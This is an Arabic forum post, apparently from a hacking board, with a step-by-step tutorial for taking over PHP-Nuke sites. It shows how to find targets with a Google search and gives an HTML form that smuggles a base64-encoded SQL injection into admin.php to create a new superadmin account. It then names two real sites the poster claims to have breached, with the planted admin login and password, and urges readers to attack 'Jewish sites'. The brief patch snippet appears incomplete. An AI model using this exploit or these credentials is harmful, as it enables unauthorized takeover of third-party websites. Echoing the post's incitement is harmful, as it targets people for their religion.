Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: ثغره مجله النيوك
Anonymous

Date:
ثغره مجله النيوك
Permalink   
 







بسم الله الرحمن الرحيم

شرح إستثمار الثغرة :-:-:-:-:-

اولا ادخل الى محرك البحث جوجل www.google.com

واكتب في خانة البحث Copyright © 2002 by PHP-Nuke. All Rights Reserved

وراح تطلع ليك نتائج كثيرة اختار اي موقع (( لكن خذ بعين الإعتبار ان الثغرة مغلقة ببعض المواقع ))

على سبيل المثال اخترت هذا الموقع www.xxx.com ومن ثم تضع بعد لينك الموقع admin.php ليصبح www.xxx.com/admin.php

وتأكد من انك دخلت الى صفحة دخول الأدمن ((لوحة التحكم))

الآن اذهب الى الــ wordpad واكتب الكود التالي :-



كود:<form name="jeen.-.hacker" method="POST" action="http://www.xxx.com/admin.php">
jeen.-.hacker- www.3asfh.net
<p>USERNAME:
<input type="text" name="add_aid">
<br>
NOME:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
jeen.-.hacker - www.3asfh.net
</p>
</form>

احفظه بصيغة html ومن ثم ادخل الى الملف الي حفظته وراح يطلع ليك الآتي :-

USERNAME:
NOME:
PASSWORD:
E-MAIL:

عبئ التفاضيل وبعدها اضغط على creat admin وبذلك انت عم تعمل ادمن جديد للموقع



الأن إرجع للوحة التحكم www.xxx.com/admin.php واكتب تفاصيل الأدمن الجديد

ومبروووووك عليك الإختراق

شرح لترقيع الثغرة :-:-:-:-:-:-

أضف الكود هذا في ملف الـــ admin.php

كود PHP:


كود:if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}

if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}


انتهينا من ترقيع الثغرة

ملاحظة هامة : استعملت في الموضوع بالكامل xxx بدل عنوان الموقع وايضا في الكود الذي سنضعه في الوورد باد غير xxx الى عنوان الموقع لتنجح في انشاء ادمن جديد واتمام الثغرة بنجاح .

نتائج ثغره من

موقعين بعد تطبيق ياهوووو وقوووول فل امش واخترق لحد يقول قديمه ثغره شغال 100/100
ومواقع اليهود كثر تراب يالله شباب

http://www.itktgroup.com/admin.php

الاسم/jeen
الباسبورد/04000400

http://www.istanbuldrama.com/admin.php
الاسم/jeen
الباسبورد/04000400



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard